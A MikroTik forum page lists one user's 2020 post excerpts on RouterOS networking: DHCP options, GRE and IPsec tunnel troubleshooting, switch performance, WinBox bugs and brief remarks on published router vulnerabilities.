Not that much of a fan of "works for me" posts but in your case, I'm in. And that just because you keep writing about your issue in atleast 3 topics without trying to debug it yourself, (hey, you did a traceroute yesterday, that's something! congrats.) And yes, it works for me in an ancien...
by Znevna
Mon Sep 28, 2020 3:50 pm
Forum: General
Topic: Search Domain (DHCP Option 119) not working
Replies: 5
Views: 1671

Re: Search Domain (DHCP Option 119) not working

As sindy pointed out, you're missing the null termination. And probably the mistake pointed out by sid5632. Adding this in /ip dhcp-server option: add code=119 name=option1 value="0x0c'soonoononono'0x02'co'0x02'uk'0x00" Which translates in: /ip dhcp-server option> print # NAME CODE VALUE R...
by Znevna
Sun Sep 27, 2020 11:54 am
Forum: General
Topic: 6.46.6 shows testing?
Replies: 2
Views: 413

Re: 6.46.6 shows testing?

by Znevna
Sat Sep 26, 2020 7:17 pm
Forum: Announcements
Topic: Newsletter 97 (September 2020)
Replies: 86
Views: 18411

Re: Newsletter 97 (September 2020)

That Premium one should have external antennas for LTE also ^^
by Znevna
Sat Sep 26, 2020 3:28 pm
Forum: General
Topic: Request for Temporary Mitigation Guide/Official Patch for CVE-2020-12695
Replies: 3
Views: 693

Re: Request for Temporary Mitigation Guide/Official Patch for CVE-2020-12695

Unless you opened up UPnP to the internet, I don't see the big drama over this.
by Znevna
Sat Sep 26, 2020 11:58 am
Forum: Announcements
Topic: Newsletter 97 (September 2020)
Replies: 86
Views: 18411

Re: Newsletter 97 (September 2020)

I loved the hAP ac³! And it comes with 128MB storage! Now it will be possible to use partitioning at home! :D Product page specifications show storage size as 128 MB, but for some reason it reads "FLASH 16 MB" on block diagram... Probably a mistake, since they redid that diagram based on ...
by Znevna
Fri Sep 25, 2020 12:01 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

Excluded, same config works fine without "workarounds" between 6.46.x versions.
Without the netwatch set in 7.1b2, the end from 6.46 fails after the keepalive timeout (10,3 = it stops running after 30 sec.) nothing to do with conntrack.
by Znevna
Fri Sep 25, 2020 10:41 am
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

Ah, stupid me... Of course it's keepalive. / interface gre unset keepalive [ find ] !!!!! this fixed my IPIP tunnel too. lol (unsetting keepalive for ipip that is). THANKS. [admin@gw-viper-rds] /interface/ipip> print Flags: R - RUNNING Columns: NAME, MTU, ACTUAL-MTU, LOCAL-ADDRESS, REMOTE-ADDRESS, ...
by Znevna
Wed Sep 23, 2020 10:01 pm
Forum: Announcements
Topic: Newsletter 97 (September 2020)
Replies: 86
Views: 18411

Re: Newsletter 97 (September 2020)

How is that related to "ARM optimizations"? What compiler flags cause WiFi issues?
by Znevna
Wed Sep 23, 2020 6:53 pm
Forum: Announcements
Topic: Newsletter 97 (September 2020)
Replies: 86
Views: 18411

Re: Newsletter 97 (September 2020)

I loved the hAP ac³! And it comes with 128MB storage! Now it will be possible to use partitioning at home! :D Yes it looks good, I am sort-of looking for a router to replace my aging RB2011 at home and this could be it (of course with an additional switch). Unfortunately there are no performance sp...
by Znevna
Tue Sep 22, 2020 11:34 pm
Forum: General
Topic: Mangle rules with unexpected behavior [SOLVED]
Replies: 7
Views: 1133

Re: Mangle rules with unexpected behavior [SOLVED]

Kinda offtopic, but I'd like to see a little brainstorming that leads to well, not the ultimate, but "almost complete multi-wan setup load-balancing WITH failover" with decent explanations and what ifs. With the recent "online school" I had to make use of the current available tu...
by Znevna
Mon Sep 21, 2020 8:20 pm
Forum: Announcements
Topic: WinBox v3.27 released!
Replies: 105
Views: 28884

Re: WinBox v3.27 released!

It is indeed a WinBox bug, checked with 3.24 and it doesn't happen, it started with 3.25.
by Znevna
Mon Sep 21, 2020 8:02 pm
Forum: General
Topic: CCR2004 poor bridge performance
Replies: 23
Views: 2252

Re: CCR2004 poor bridge performance

He insists that you removed the "fast path rule" which doesn't exist, in your setup or anywhere in the RouterOS world, there isn't any "fast path rule", there's only a "fasttrack rule" if you were doing any kind of firewalling/routing on it, which again, is not the case...
by Znevna
Mon Sep 21, 2020 6:23 pm
Forum: General
Topic: IP Cloud
Replies: 75
Views: 35240

Re: IP Cloud

they can deprecate anytime support for version older than 6.43, why would anyone care about those with so many security issues in them anyway?
by Znevna
Mon Sep 21, 2020 5:08 pm
Forum: General
Topic: CCR2004 poor bridge performance
Replies: 23
Views: 2252

Re: CCR2004 poor bridge performance

Paternot, you are confusing fastpath with fasttrack. Document yourself better about the two.
by Znevna
Mon Sep 21, 2020 1:52 pm
Forum: General
Topic: CCR2004 poor bridge performance
Replies: 23
Views: 2252

Re: CCR2004 poor bridge performance

Well, like in the other thread, it is mentioned that this is advertised as a router, not a switch, so maybe performance between the 25Gbps ports and 10Gbps ports might be better than only using the 10Gbps ports. I see that config as the intended use for this device. Archived datasheet of that PX is ...
by Znevna
Mon Sep 21, 2020 1:13 pm
Forum: General
Topic: CCR2004 poor bridge performance
Replies: 23
Views: 2252

Re: CCR2004 poor bridge performance

@Paternot got it a little wrong. But, those tests say 39444Mbps, 3248kpps at 1518 byte packet size on ALL ports. (thus involving all 12x 10G ports and the two remaining uplinks of 25Gbps out of the 4 total on that 98PX1012, two of which are connected to the CPU?). Is performance that limited when us...
by Znevna
Mon Sep 21, 2020 12:38 pm
Forum: General
Topic: Weird PING behavior on RouterOS
Replies: 10
Views: 950

Re: Weird PING behavior on RouterOS

Having two bridges doesn't disable hardware offload for one of the bridges? I'd suspect an IP conflict too, don't know if it can be spotted in IP/ARP but I know I've seen one when doing an IP Scan using Tools/IP Scan for the whole subnet (one IP was showing twice with two different MACs) which were ...
by Znevna
Mon Sep 21, 2020 12:01 am
Forum: General
Topic: hAP ac2 over heated vent holes mod
Replies: 16
Views: 1488

Re: hAP ac2 over heated vent holes mod

the topic is about hap ac2.. if it derailed to ccr1009 not my fault :p
by Znevna
Sun Sep 20, 2020 11:28 pm
Forum: General
Topic: hAP ac2 over heated vent holes mod
Replies: 16
Views: 1488

Re: hAP ac2 over heated vent holes mod

yes, yes, aluminium mesh cages for proper wifi coverage.
by Znevna
Sun Sep 20, 2020 6:20 pm
Forum: General
Topic: CCR2004 poor bridge performance
Replies: 23
Views: 2252

Re: CCR2004 poor bridge performance

uhm, and how was this test done exactly? except the " two loop-backed 10G ports" there's nothing mentioned. what util, what generated the traffic on which port, what captured it on what port.. except RFC2544 which states hours of testing.. nothing. so.. again, what and how did you test exa...
by Znevna
Sun Sep 20, 2020 1:05 pm
Forum: RouterOS v7 BETA
Topic: After installing ROS 7.1beta2
Replies: 3
Views: 1521

Re: After installing ROS 7.1beta2

Only when doing it via WinBox/GUI, from terminal it works fine.
I wrote about it here: viewtopic.php?f=1&t=165248#p815503
PS: you could change the topic name to something closer to the issue though
by Znevna
Sat Sep 19, 2020 8:41 pm
Forum: Announcements
Topic: WinBox v3.27 released!
Replies: 105
Views: 28884

Re: WinBox v3.27 released!

Bug(?) (3.15 -> current): make any changes to an opened window (just moving it is enough) save session, close that window to which you've made changes. try to open that window again -> winbox session crashes. LE: I couldn't test with releases older than 3.15 because of the protocol changes or whatev...
by Znevna
Wed Sep 16, 2020 1:28 pm
Forum: General
Topic: Terrible speeds over point to point 10G SFP+
Replies: 5
Views: 541

Re: Terrible speeds over point to point 10G SFP+

Writing to support about improper use of equipment is pointless. Those CRSs are switches, not routers. Any firewall rule cripples them. Check https://mikrotik.com/product/CRS326-24G-2SplusRM#fndtn-testresults Bandwidth tests ran from devices with a single core CPU running at 800MHz is also bad. Ther...
by Znevna
Tue Sep 15, 2020 11:31 pm
Forum: General
Topic: Fast Path issues (Solved)
Replies: 1
Views: 398

Re: Fast Path issues (Solved)

Wan bridge? why do you have such a thing? what is the purpose of it? Only one bridge is hardware offloaded if I remember right. And on rb4011 even that one bridge is hardware offloaded if you disable rstp/stp. Something in your config is causing those issues. Export a sanitized version of it if you ...
by Znevna
Tue Sep 15, 2020 10:43 pm
Forum: General
Topic: Can't login here with my password from 12 September 2020
Replies: 4
Views: 591

Re: Can't login here with my password from 12 September 2020

False statement there about what passwords were "declared invalid". 1. My password had lower case and upper case characters + numbers and I also had to reset it. 2. I doubt that any forum stores passwords the way you think that are stored, it should be (almost) impossible to recover the pl...
by Znevna
Mon Sep 14, 2020 10:12 am
Forum: General
Topic: CVE-2020-11881 PATCH [SOLVED]
Replies: 16
Views: 2232

Re: CVE-2020-11881 PATCH [SOLVED]

If you are watching the release dates so close you'd notice that atleast the last 3 (maybe more) long term builds were released to public after ~7 days of probably inside testing since they were built.
Read first, blame later.
Cheers.
by Znevna
Mon Sep 14, 2020 9:54 am
Forum: General
Topic: CVE-2020-11881 PATCH [SOLVED]
Replies: 16
Views: 2232

Re: CVE-2020-11881 PATCH [SOLVED]

There is an entry for 6.47.2 which states
*) smb - fixed SMB server (introduced in v6.47);
So in 6.47 maybe SMB was broken anyway, so the vulnerability didn't have what to crash?
by Znevna
Sat Sep 12, 2020 4:27 pm
Forum: Announcements
Topic: Expected down time for this forum SEPT 11
Replies: 42
Views: 7054

Re: Expected down time for this forum SEPT 11

After reading that the old passwords no longer work I've said to give it a try and I've logged out. Well, indeed I had to reset the password since the old one no longer worked. And yes the old one had all the security strength requirements since I've reused the old password (yes, bad, I know, but he...
by Znevna
Sun Sep 06, 2020 11:19 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

You can write the interface name manually and it will work even if there's no list from which you could easily select it. On another note, I can't figure out how to setup load balancing using ECMP. More exactly how to adapt this old tutorial for v7: https://wiki.mikrotik.com/wiki/ECMP_load_balancing...
by Znevna
Sun Sep 06, 2020 8:20 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

bug: 7.1beta2, hAP ac2 changing any interface name belonging to the internal switch using WinBox GUI makes the router reboot: sep/06/2020 20:14:55 system,error,critical router rebooted because some critical program crashed Doing the same thing from terminal however: /interface/ethernet/print; /inter...
by Znevna
Sun Sep 06, 2020 12:08 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

This gentlemen wrote an in-depth tutorial for MikroTik site to site VPN: https://rickfreyconsulting.com/wireguard-site-to-site-vpn-example/ It's not rocket science to build up a Wireguard tunnel and route something over it. Do you guys get a cut for traffic generated to his site or out of how many ...
by Znevna
Sat Sep 05, 2020 9:59 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

This gentlemen wrote an in-depth tutorial for MikroTik site to site VPN: https://rickfreyconsulting.com/wireguard-site-to-site-vpn-example/ That's hardly an "in depth tutorial". And don't get me started on the quality of the screenshots, missing accompanied selectable text for whatever go...
by Znevna
Tue Sep 01, 2020 2:44 pm
Forum: Announcements
Topic: WinBox v3.25 released!
Replies: 68
Views: 9839

Re: WinBox v3.25 released!

Newer WinBox versions shouldn't break client's routers running stable, older ROS versions, disconnecting CAPs or whatever else the current version is able to kill or mess up with. Or atleast there should be some warning regarding this, when it encounters unsupported (anymore) ROS versions instead of...
by Znevna
Tue Sep 01, 2020 10:11 am
Forum: Announcements
Topic: WinBox v3.25 released!
Replies: 68
Views: 9839

Re: WinBox v3.25 released!

You can say that this version has a killer feature. Open CAPsMAN, click on "Radio" tab and watch all your CAPs disconnect. Also keeping that tab open will not let any CAP connect back. "failed to connect, timeout". I am running 9 CAPs (18 radios) and cannot reproduce this. All C...
by Znevna
Mon Aug 31, 2020 8:23 pm
Forum: Announcements
Topic: WinBox v3.25 released!
Replies: 68
Views: 9839

Re: WinBox v3.25 released!

You can say that this version has a killer feature. Open CAPsMAN, click on "Radio" tab and watch all your CAPs disconnect. Also keeping that tab open will not let any CAP connect back. "failed to connect, timeout". LE: they do come back eventualy but nothing shows up on the Radio...
by Znevna
Sun Aug 30, 2020 12:05 pm
Forum: RouterOS v7 BETA
Topic: [ROSv7b4] - OpenVPN - Auth SHA256 ?
Replies: 3
Views: 3285

Re: [ROSv7b4] - OpenVPN - Auth SHA256 ?

OpenVPN should be dropped in v7, make room for something more useful.
by Znevna
Sat Aug 29, 2020 3:00 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

Tiny (not realy) bug:
I don't know why but my dynamic DNS servers went *poof* from the config. (Which are set by the pppoe client).
No wan disconnect, nothing in the logs. They just went missing.
And I was wondering why the DNS cache is empty...
by Znevna
Fri Aug 28, 2020 8:23 am
Forum: General
Topic: Mikrotik or NOT!!! Industry standarts say no!! Why? [SOLVED]
Replies: 114
Views: 11475

Re: Mikrotik or NOT!!! Industry standarts say no!! Why? [SOLVED]

There's nothing hot about this topic. You say you're from Latvia, give MikroTik a call to help you choose the hardware based on your not yet mentioned requirements (since MikroTik is a Latvian company, as you know already, right?). Unless you're not from there and everything you've said here is comp...
by Znevna
Tue Aug 25, 2020 6:02 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

Are the issues with RAW Firewall known? If you have any rules there (two+) issuing a disable/enable on any of them makes the counters for the existing enabled rules go crazy. Also I have a rule that keeps counting packets when enabled even though there shouldn't be any matching traffic (the notrack ...
by Znevna
Tue Aug 25, 2020 5:12 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

Ah, stupid me... Of course it's keepalive. / interface gre unset keepalive [ find ] !!!!! this fixed my IPIP tunnel too. lol (unsetting keepalive for ipip that is). THANKS. [admin@gw-viper-rds] /interface/ipip> print Flags: R - RUNNING Columns: NAME, MTU, ACTUAL-MTU, LOCAL-ADDRESS, REMOTE-ADDRESS, ...
by Znevna
Sun Aug 23, 2020 3:05 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta2 [development] is released!
Replies: 387
Views: 107183

Re: v7.1beta2 [development] is released!

So.. little broblem. I've upgraded from 6.46.6 to 7.1beta2 directly (I know, bad) ...and this happend with my static routes. I made an export before and after the upgrade to see what changed. I get the missing gateway, but the IP in pref-src? (and only there?) why? before: /ip route add distance=1 d...
by Znevna
Wed Aug 19, 2020 10:53 pm
Forum: General
Topic: IKEv2 between MikroTiks, sides switching, initiator <> responder
Replies: 13
Views: 2282

Re: IKEv2 between MikroTiks, sides switching, initiator <> responder

In the manual there's a warning Warning: Phase 1 is not re-keyed if DPD is disabled when lifetime expires, only phase 2 is re-keyed. To force phase 1 re-key, enable DPD. This switch only happens when both sides are Tiks. Or so I've noticed until now. That's why I thought that setting DPD to disabled...
by Znevna
Wed Aug 19, 2020 8:42 pm
Forum: General
Topic: IKEv2 between MikroTiks, sides switching, initiator <> responder
Replies: 13
Views: 2282

Re: IKEv2 between MikroTiks, sides switching, initiator <> responder

On the clock again. Now since I've established that phase1 rekeying is the culprit (I think? right?) if I disable DPD on the server side (as per the documentation DPD is the one forcing phase 1 rekey) how will that affect my other connected clients to it? Do Windows clients care about the DPD set on...
by Znevna
Tue Aug 18, 2020 8:44 pm
Forum: General
Topic: IKEv2 between MikroTiks, sides switching, initiator <> responder
Replies: 13
Views: 2282

Re: IKEv2 between MikroTiks, sides switching, initiator <> responder

On the clock, now it's back to initiator (1 day). So, it has a chance to switch every 24 hours, which equals to the lifetime set in the ipsec profile, phase 1 ? I've set a script to check for sides switching and if any switch occurs to notify me over Telegram. That's how I pinned it down. (that Tele...
by Znevna
Mon Aug 17, 2020 8:45 pm
Forum: General
Topic: IKEv2 between MikroTiks, sides switching, initiator <> responder
Replies: 13
Views: 2282

Re: IKEv2 between MikroTiks, sides switching, initiator <> responder

Ok, so I'm pretty sure that during this (captured from the client / initiator) the sides switched (initiator -> responder). I'll also try to capture a switch back to initiator. I don't know if it provides anything useful. 20:20:54 ipsec,debug ===== received 572 bytes from SERVER.IP[4500] to CLIENT.I...
by Znevna
Sun Aug 16, 2020 2:50 pm
Forum: General
Topic: IKE2 identity not found (IOS to Mikrotik) [SOLVED]
Replies: 25
Views: 10007

Re: IKE2 identity not found (IOS to Mikrotik) [SOLVED]

On IOS, in the Authentication section, you have to click the User Authentication and select "None", go back and be sure that Use Certificate is checked.
by Znevna
Mon Aug 10, 2020 2:07 pm
Forum: General
Topic: RB760iGS VPN
Replies: 10
Views: 2121

Re: RB760iGS VPN

My reply is a little offtopic, but I do hope that the internal subnet you are using (172.168.0.0/20) is fictional and you aren't realy using that range.
Because, well, that range isn't part of the private IPv4 ranges defined in RFC1918.
And it looks like it belongs to OATH/yahoo, not good.
by Znevna
Tue Aug 04, 2020 2:25 pm
Forum: General
Topic: IKEv2 between MikroTiks, sides switching, initiator <> responder
Replies: 13
Views: 2282

Re: IKEv2 between MikroTiks, sides switching, initiator <> responder

Safe to say that Pure-VPN is using MikroTiks ? I've set a logging rule for "topics=ipsec,!packet" on one of those hAP ac2 client that sits mostly idle, maybe I can catch a switch in the logs (from initiator to responder) hoping that these may provide anything useful regarding this. I don't...
by Znevna
Mon Aug 03, 2020 10:42 am
Forum: General
Topic: IKEv2 between MikroTiks, sides switching, initiator <> responder
Replies: 13
Views: 2282

IKEv2 between MikroTiks, sides switching, initiator <> responder

Hello! As per the topic title, I'm running a few IKEv2 tunnels on a RB4011. A bunch of Windows clients connect to it, three of my other MikroTiks for now (hAP ac2) and one FreeBSD based router I think (support for some software uses it) which stacks up PH2 count from time to time, but that's not an ...
by Znevna
Sun Jul 26, 2020 12:10 am
Forum: General
Topic: Add emoji to the ssid name
Replies: 27
Views: 9700

Re: Add emoji to the ssid name

The client (OS/driver/etc) also has to know how to translate that SSID into an emoji.
Windows 7 doesn't know how to do that for example. Windows 10 does.
No joke. Just.. not for production. Not all clients will show what you intended to be seen :)
by Znevna
Sat Jul 25, 2020 9:50 pm
Forum: General
Topic: Add emoji to the ssid name
Replies: 27
Views: 9700

Re: Add emoji to the ssid name

Works fine on 6.46.6 too.
by Znevna
Fri Jul 10, 2020 10:43 pm
Forum: Announcements
Topic: v6.47.1 [stable] is released!
Replies: 147
Views: 66859

Re: v6.47.1 [stable] is released!

Nobody cares about the "reduced resell value" because of the sector writes count. Who advertises de sector writes count when selling their hardware? Is that a thing? realy? Selling a cheap MikroTik, cheaper? how much "resell value" loss are we talking about? If you decided to dit...
by Znevna
Tue Feb 25, 2020 2:04 pm
Forum: Announcements
Topic: v6.47beta [testing] is released!
Replies: 269
Views: 137430

Re: v6.47beta [testing] is released!

I don't know when this was introduced but, I now have to issue ":ip ipsec installed-sa flush" after my WAN (PPPoE) goes down and back up. If I don't IPv4 routing is broken for some reason, no packets go over WAN (packets that don't match any policies). I only have local subnets in policies...
by Znevna
Mon Feb 10, 2020 11:14 pm
Forum: Announcements
Topic: v6.47beta [testing] is released!
Replies: 269
Views: 137430

Re: v6.47beta [testing] is released!

It's probably just a missed bug, you can still set the antenna gain from terminal. There's no mention of it beeing removed in the changelog, no need to panic like that. It's under testing branch for a reason. Hold your horses. I'm happy that this got fixed: *) ike2 - fixed DHCP Inform package handli...
by Znevna
Sat Feb 01, 2020 11:51 pm
Forum: General
Topic: Audiophile Level(Low Noise Floor, Silent) Mikrotik vs Ubiquiti Unifi Network Switch
Replies: 31
Views: 6140

Re: Audiophile Level(Low Noise Floor, Silent) Mikrotik vs Ubiquiti Unifi Network Switch

BUT, but.. If he uses the 1000$ wonder switch audiophile quality for them TVs/ Netflix, imagine how the colors and everything on those movies will be, if it does so many wonders for audio. Or if simply browsing this forum, imagine the layouts and everything that we're not seeing while using our chea...
by Znevna
Sat Feb 01, 2020 8:31 pm
Forum: General
Topic: Audiophile Level(Low Noise Floor, Silent) Mikrotik vs Ubiquiti Unifi Network Switch
Replies: 31
Views: 6140

Re: Audiophile Level(Low Noise Floor, Silent) Mikrotik vs Ubiquiti Unifi Network Switch

But, here's what I don't get, you have already one of these "Sotm sNH-10G" which you like. Why don't you get more of them for your TV's and everything else? You know, to have audiophile-grade Netflix and HBO and whatever too. Why settle for switches that are 4 to 10 times cheaper than that...
by Znevna
Sat Feb 01, 2020 2:01 pm
Forum: General
Topic: Audiophile Level(Low Noise Floor, Silent) Mikrotik vs Ubiquiti Unifi Network Switch
Replies: 31
Views: 6140

Re: Audiophile Level(Low Noise Floor, Silent) Mikrotik vs Ubiquiti Unifi Network Switch

From the mac mini mod: "Blacker backgrounds, better dynamics and voices are so realistic it's almost scary!" :lol: :lol: And the switch you mentioned in the first post, Sotm sNH-10G, 800$ for a 10 (8+2) port DUMB (unmanaged) gigabit switch? :lol: The killer there are the cables, 1.5M patch...
by Znevna
Fri Jan 31, 2020 11:12 am
Forum: General
Topic: Changing PPPoE client name disconnects PPPoE and re-connects - WHY?
Replies: 9
Views: 2193

Re: Changing PPPoE client name disconnects PPPoE and re-connects - WHY?

File a bug report if it is a technical issue.
by Znevna
Sat Jan 25, 2020 7:58 pm
Forum: General
Topic: Ping is timeout !
Replies: 8
Views: 1285

Re: Ping is timeout !

Why do you have this
/ip firewall nat
add action=masquerade chain=srcnat out-interface=bridge1
On a PtP Link? and on both ends too? where did you get this from?
WHY??
by Znevna
Thu Jan 23, 2020 3:16 pm
Forum: General
Topic: ❗️❓ Fake Mikrotik devices !!? [SOLVED]
Replies: 10
Views: 3038

Re: ❗️❓ Fake Mikrotik devices !!? [SOLVED]

:lol:
Glad someone else caught that.
Anyway, that's the least of his problems.
by Znevna
Fri Jan 17, 2020 5:15 pm
Forum: General
Topic: ipsec ikev2 Split Include do not send to windows 10
Replies: 8
Views: 2188

Re: ipsec ikev2 Split Include do not send to windows 10

I've tried, but I don't know how to disable FP for PPPoE. I've set allow-fast-path=no in IP settings and in bridge settings (though it is not part of a bridge but I've disabled everythig that had fast path in it). I've disabled the fasttracking FW rule. Rebooted. And I still see traffic in "FP ...
by Znevna
Thu Jan 16, 2020 5:01 pm
Forum: General
Topic: ipsec ikev2 Split Include do not send to windows 10
Replies: 8
Views: 2188

Re: ipsec ikev2 Split Include do not send to windows 10

If your WAN Type is PPPoE on MikroTik this would not work, issue also described here: https://forum.mikrotik.com/viewtopic.php?f=2&t=154743&p=764979#p764979 And I also have (still) an open ticket regarding this, SUP-3815, support acknowledged an issue that fits my description. I was hoping t...
by Znevna
Wed Jan 15, 2020 10:56 am
Forum: General
Topic: IKE2 identity not found (IOS to Mikrotik) [SOLVED]
Replies: 25
Views: 10007

Re: IKE2 identity not found (IOS to Mikrotik) [SOLVED]

I wrote the exact same thing a few posts above. Glad you got it working.
by Znevna
Fri Jan 10, 2020 11:37 pm
Forum: General
Topic: IKE2 identity not found (IOS to Mikrotik) [SOLVED]
Replies: 25
Views: 10007

Re: IKE2 identity not found (IOS to Mikrotik) [SOLVED]

I tested this last month and it worked with My ID and Remote ID set to "auto".
iOS 13.2.something.
User Authentication was set to "None" and "Local ID" was left empty in iOS.
Can't give more details as I don't have any iOS devices around right now.
by Znevna
Thu Jan 09, 2020 9:51 am
Forum: General
Topic: Changing PPPoE client name disconnects PPPoE and re-connects - WHY?
Replies: 9
Views: 2193

Re: Changing PPPoE client name disconnects PPPoE and re-connects - WHY?

How often do you change your wan interface name that this is such a big issue for you?
by Znevna
Wed Jan 08, 2020 3:02 am
Forum: Scripting
Topic: tx rx fp rx dropped pppoe account
Replies: 32
Views: 8155

Re: tx rx fp rx dropped pppoe account

Weird. I have not seen something like this with PPPoE and we mostly have PPPoE around here, almost all ISPs offer PPPoE connections. A config export wouldn't hurt, before digging more. As for the FP counter you'd have to be sure your fastracking rules are properly set and you don't have your traffic...
  • 1
  • 2